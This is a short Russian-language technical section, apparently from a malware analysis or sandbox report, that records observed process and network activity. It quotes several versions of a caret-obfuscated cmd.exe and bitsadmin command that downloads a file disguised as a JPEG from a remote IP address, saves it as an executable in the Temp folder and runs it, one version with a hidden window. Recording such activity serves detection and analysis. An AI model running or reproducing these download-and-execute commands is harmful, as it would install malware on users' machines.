Техническая информация
- '<SYSTEM32>\cmd.exe' /c b^i^t^sad^min^ /t^ra^n^s^f^e^r^ ^/^d^o^w^n^l^o^a^d "http://185.165.29.68/sexy.jpg" "%LOCALAPPDATA%\Temp/ASDa.exe" && "%LOCALAPPDATA%\Temp/ASDa.exe"
- '18#.#65.29.68':80
- '<SYSTEM32>\cmd.exe' /c b^i^t^sad^min^ /t^ra^n^s^f^e^r^ ^/^d^o^w^n^l^o^a^d "http://185.165.29.68/sexy.jpg" "%LOCALAPPDATA%\Temp/ASDa.exe" && "%LOCALAPPDATA%\Temp/ASDa.exe"' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer /download "http://185.165.29.68/sexy.jpg" "%LOCALAPPDATA%\Temp/ASDa.exe"